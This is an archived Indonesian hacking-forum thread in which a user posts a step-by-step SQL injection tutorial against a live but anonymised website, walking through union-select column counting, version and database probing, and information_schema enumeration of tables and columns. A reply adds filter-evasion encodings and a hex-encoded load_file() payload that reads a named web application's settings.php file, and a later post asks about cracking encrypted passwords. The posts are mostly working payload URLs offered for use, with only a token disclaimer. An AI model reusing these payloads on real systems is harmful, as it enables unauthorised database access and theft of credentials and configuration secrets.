PDA

View Full Version : SqL iseng" lagi bt ..


OpenProxy
04-08-08, 05:12 PM
Hoayemm ngantukz , bete , kepanasan nintau mo ba apa iseng" maen" mdh"an boleh bljar bersama dgn tomohoners yg laen yg so lebeh paham ,,,

Say Hi dulu sama Biznet & nTc :x

Langsng aja sebenarnya ini tntng SqL injection .... cm bljr jg dr orang mdh"an ;) yang dah ngerti mohon bimbinganna :D

.................................................. ..........................

"category.php?cat_id"

1. Cari Target ..... mo cari bisa sama om google apa lewat scanner :D
http://www.x.com/category.php?cat_id=12
(maaf nama webnya nda di tampilin .. :) )

http://i238.photobucket.com/albums/ff149/donghaee/lqs/1.jpg

2.Mencari True Dan False Pada Target
Masukkan command and 1=1 dan and 1=2
http://www.x.com/category.php?cat_id=12 and 1=1 (True)
http://i238.photobucket.com/albums/ff149/donghaee/lqs/2.jpg
Gambar True

http://www.x.com/category.php?cat_id=12 and 1=2 (False)
http://i238.photobucket.com/albums/ff149/donghaee/lqs/3.jpg
Gambar False ( heheheheh dapet jg :d )

3.Mencari Jumlah Table Command: order by
Gunakan command order by untuk mencari jumlah table dengan melihat table yang false
http://www.x.com/category.php?cat_id=12 order by 1/*
http://www.x.com/category.php?cat_id=12 order by 2/*
http://www.x.comcategory.php?cat_id=12 order by 3/*
http://www.x.com/category.php?cat_id=12 order by 4/*
http://www.x.com/category.php?cat_id=12 order by 5/*
http://www.x.com/category.php?cat_id=12 order by 6/* (False)
http://i238.photobucket.com/albums/ff149/donghaee/lqs/4.jpg
Disini berarti jumlah tablenya ada 5

4.Membuktikan jumlah table dengan union select
http://www.x.com/category.php?cat_id=12 union select 1,2,3,4,5/* (True)
http://i238.photobucket.com/albums/ff149/donghaee/lqs/5.jpg

http://www.x.com/category.php?cat_id=12 union select 1,2,3,4,5,6/* (False)
http://i238.photobucket.com/albums/ff149/donghaee/lqs/6.jpg

5.Mengeluarkan angka angka pada table dengan command –
http://www.x.com/category.php?cat_id=-12 union select 1,2,3,4,5/*
http://i238.photobucket.com/albums/ff149/donghaee/lqs/7.jpg
Disini Terlihat angka 2 dan 5, angka” itu dipakai untuk memasukkan sql query

6.Masukkan angka 2 dan 5 untuk melihat sql query dan Version dari Sql
http://www.x.com/category.php?cat_id=-12 union select 1,version(),3,4,database()/*
http://i238.photobucket.com/albums/ff149/donghaee/lqs/8.jpg
Versi My Sql 5 : 5.0.45-log

7.Melihat Database mengunakan command information.schema
http://www.x.com/category.php?cat_id=-12 union select 1,table_name,3,4,5 from information_schema.tables where table_schema=database() limit 0,1/*

http://www.x.com/category.php?cat_id=-12 union select 1,table_name,3,4,5 from information_schema.tables where table_schema=database() limit 1,1/*

http://www.x.com/category.php?cat_id=-12 union select 1,table_name,3,4,5 from information_schema.tables where table_schema=database() limit 2,1/*

Note :
limit 0,1/* <-- yang ditambahin ini aja
limit 1,1/*
limit 2,1/*
limit 3,1/*
limit 4,1/* dst……

http://www.x.com/category.php?cat_id=-12 union select 1,table_name,3,4,5 from information_schema.tables where table_schema=database() limit 0,1/*


http://i238.photobucket.com/albums/ff149/donghaee/lqs/9.jpg


Sekarang melihat kolom dalam table author
http://www.xcom/category.php?cat_id=-12 union select 1,column_name,3,4,5 from information_schema.columns where table_schema=database() limit 0,1/*

http://i238.photobucket.com/albums/ff149/donghaee/lqs/10.jpg

hoayemm sampe disini dulu neh ... ngantukz heheheh sebenarnya trang bisa liat jg login" user dll... tinggal tergantung torang mo maenin yg di information mana .. ok mdh"an ngerti .. kl nd ngerti berarti selamat heheheh soalna qt jg pertama nd ngerti hahahahha ..... slnjutnya tinggal di kreasikan aja :D .....

N.b : Jangan Pernah Merusak :D ... just for learn ok...
Mudah"an IT tomohoners bisa tmbah maju ... hoayemmmm maap kl penjelasan sukar di mengerti .. just for share and learn bareng kata hehehehe .....


Muahhh Muahhh muahhhh :"> :"> :"> :"> :"> :"> :">

biznet
04-08-08, 08:38 PM
wah wah wah wah .. memang sangar ni OpenProxy

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?lng=' at line 1

line2.php?lng=ru&cat=3&art=25/line2.php?lng=

om open open YM pls :P live tutor pls

OpenProxy
04-08-08, 10:54 PM
Auww... :D Biznet deh gitu loh... apa qt bantuin kasih tutor dari biznet yg provider ezia hahahaha.... koq bisa"na ezia gitu yah om hahahah dibiarin aja sama mrka webna wkwkwkkw :)) ...

Nb : Dilarang Merusak

just_sepay
05-08-08, 10:51 AM
mantap ^:)^ ^:)^ ^:)^
ada yg qt mo tanya...... [-O<

FLY_AWAY
05-08-08, 03:50 PM
adoh mantaaappp ^:)^ ^:)^ ^:)^

OpenProxy
05-08-08, 07:15 PM
auww ada F_R_A_N_K ;) kangen eh :))

nTc
08-08-08, 05:56 PM
mo tambah sadiki :D

hheheh + = %20 = /**/ = spaci fungsina sama kl mslna masih ada yg biun

oh ia ampir lupa 0x3a = : <--- sebagai Hex .... fungsina sebagai pembatas antara username deng password :D
ato jg ada yg biasa pake char(58) ;) .. jadi biasana kl upload data lwt sql injec memakai hex ....

contoh : http://Sitename/litenew//index.php?mode=view&id=-1%20union%20select%201,load_file(0x433A5C417070536 572765C7777775C6C6974656E65775C73657474696E67732E7 06870),3,4,5/* <---- web apps litenews-01 v1.2

0x433A5C417070536572765C7777775C6C6974656E65775C73 657474696E67732E706870 = hex ( C:\AppServ\www\litenew\settings.php )

kl binarynya :
01000011 00111010 01011100 01000001 01110000 01110000 01010011 01100101 01110010 01110110 01011100 01110111 01110111 01110111 01011100 01101100 01101001 01110100 01100101 01101110 01100101 01110111 01011100 01110011 01100101 01110100 01110100 01101001 01101110 01100111 01110011 00101110 01110000 01101000 01110000

kl base 64 : QzpcQXBwU2Vydlx3d3dcbGl0ZW5ld1xzZXR0aW5ncy5waHA=


moga" bermanfaat .. ^^

thx okedeh :D

biznet
12-08-08, 07:48 PM
mantap om .. jgn lupa om tutor nya ;)

brusly
03-09-08, 08:33 AM
wuih.... mantap.... post.... langsung coba... ;)) ;))

psycho
03-09-08, 09:18 AM
cool duds

Rendy
12-11-09, 04:20 PM
mo tambah sadiki :D

hheheh + = %20 = /**/ = spaci fungsina sama kl mslna masih ada yg biun

oh ia ampir lupa 0x3a = : <--- sebagai Hex .... fungsina sebagai pembatas antara username deng password :D
ato jg ada yg biasa pake char(58) ;) .. jadi biasana kl upload data lwt sql injec memakai hex ....

contoh : http://Sitename/litenew//index.php?mode=view&id=-1%20union%20select%201,load_file(0x433A5C417070536 572765C7777775C6C6974656E65775C73657474696E67732E7 06870),3,4,5/* <---- web apps litenews-01 v1.2

0x433A5C417070536572765C7777775C6C6974656E65775C73 657474696E67732E706870 = hex ( C:\AppServ\www\litenew\settings.php )

kl binarynya :
01000011 00111010 01011100 01000001 01110000 01110000 01010011 01100101 01110010 01110110 01011100 01110111 01110111 01110111 01011100 01101100 01101001 01110100 01100101 01101110 01100101 01110111 01011100 01110011 01100101 01110100 01110100 01101001 01101110 01100111 01110011 00101110 01110000 01101000 01110000

kl base 64 : QzpcQXBwU2Vydlx3d3dcbGl0ZW5ld1xzZXR0aW5ncy5waHA=


moga" bermanfaat .. ^^

thx okedeh :D



om kalo mo cari tau password2 yang di encrypt gitu, ada softwerenya kah ? tolong di jelasin... pengen tau.
thanks